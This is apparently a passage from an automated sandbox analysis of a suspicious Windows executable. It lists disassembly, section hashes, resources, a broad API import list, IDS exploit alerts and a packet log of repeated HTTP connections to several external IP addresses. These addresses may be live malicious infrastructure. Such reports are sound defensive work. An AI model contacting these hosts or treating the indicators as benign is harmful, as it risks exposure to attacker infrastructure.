                                                                        jmp dword ptr [00416750h+ecx*4]
                                                                        nop
                                                                        jmp dword ptr [004166D4h+ecx*4]
                                                                        nop
                                                                        inc cx
                                                                        add byte ptr [eax-4BFFBE9Ah], dl
                                                                        inc cx
                                                                        add byte ptr [ebx], ah
                                                                        ror dword ptr [edx-75F877FAh], 1
                                                                        inc esi
                                                                        add dword ptr [eax+468A0147h], ecx
                                                                        add al, cl
                                                                        jmp 00007F7E7AC77907h
                                                                        add esi, 03h
                                                                        add edi, 03h
                                                                        cmp ecx, 08h
                                                                        jc 00007F7E787FF0CEh
                                                                        rep movsd
                                                                        jmp dword ptr [00000000h+edx*4]
                                                                        Programming Language:
                                                                        • [ C ] VS2010 SP1 build 40219
                                                                        • [C++] VS2010 SP1 build 40219
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ASM] VS2010 SP1 build 40219
                                                                        • [RES] VS2010 SP1 build 40219
                                                                        • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T17:57:24.228610+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.7 | 49730 | TCP
2024-11-07T17:58:03.692339+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.7 | 49841 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Nov 7, 2024 17:58:36.406928062 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.407114029 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:36.408174038 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:36.413069963 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:41.842068911 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:41.847064972 CET8049854209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:41.847146034 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:41.863027096 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:41.868011951 CET8049854209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:42.534456968 CET8049854209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:42.573124886 CET8049854209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:42.573183060 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:43.373087883 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:44.392074108 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:44.397114038 CET8049855209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:44.397213936 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:44.408447981 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:44.413333893 CET8049855209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:45.071439028 CET8049855209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:45.109424114 CET8049855209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:45.112994909 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:45.920134068 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:47.038800955 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:47.043823004 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.043940067 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:47.112903118 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:47.117846012 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.117856979 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.721957922 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.760505915 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.760646105 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:48.623075008 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:49.643054962 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:49.648216963 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:49.648896933 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:49.657613039 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:49.662568092 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:50.336545944 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:50.374924898 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:50.375030994 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:50.389314890 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:50.394958973 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:55.771259069 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:55.776160002 CET804985847.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:55.776228905 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:55.792196989 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:55.796984911 CET804985847.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:56.732330084 CET804985847.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:56.826167107 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:56.910331964 CET804985847.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:56.910407066 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:57.296811104 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:58.313663960 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:58.318716049 CET804985947.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:58.318870068 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:58.330439091 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:58.335982084 CET804985947.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:59.293710947 CET804985947.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:59.424825907 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:59.485843897 CET804985947.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:59.486402035 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:59.841945887 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:00.861840963 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:00.866781950 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:00.866991043 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:00.878912926 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:00.883965015 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:00.883977890 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:01.803971052 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:01.857417107 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:01.980545998 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:01.980602980 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:02.388969898 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:03.408339977 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:03.415206909 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:03.415297031 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:03.424273968 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:03.429121017 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:04.377646923 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:04.435561895 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:04.561451912 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:04.562632084 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:04.563509941 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:04.568286896 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:09.631587982 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:09.636496067 CET8049862128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:09.636586905 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:09.648832083 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:09.654014111 CET8049862128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:11.154355049 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:11.159638882 CET8049862128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:11.159694910 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:12.174693108 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:12.179616928 CET8049863128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:12.180102110 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:12.195035934 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:12.200014114 CET8049863128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:13.703170061 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:13.708642960 CET8049863128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:13.708750010 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:14.720499039 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:14.725780964 CET8049864128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:14.726231098 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:14.736999989 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:14.741852999 CET8049864128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:14.742301941 CET8049864128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:16.248827934 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:16.255186081 CET8049864128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:16.256875992 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:17.339165926 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:17.344926119 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:17.345009089 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:17.387095928 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:17.392179966 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:19.906847000 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:19.951901913 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:20.027719021 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:20.027844906 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:20.028925896 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:20.033806086 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:25.102818012 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:25.107850075 CET8049866217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:25.108001947 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:25.119571924 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:25.124577045 CET8049866217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:25.928353071 CET8049866217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:26.035686970 CET8049866217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:26.035744905 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:26.624037027 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:27.644859076 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:27.650145054 CET8049867217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:27.650342941 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:27.664902925 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:27.669934034 CET8049867217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:28.457751036 CET8049867217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:28.529373884 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:28.566087008 CET8049867217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:28.566142082 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:29.170864105 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:30.192914009 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:30.198093891 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:30.198174000 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:30.212539911 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:30.217375040 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:30.217559099 CET8049869217.70.184.50192.168.2.7
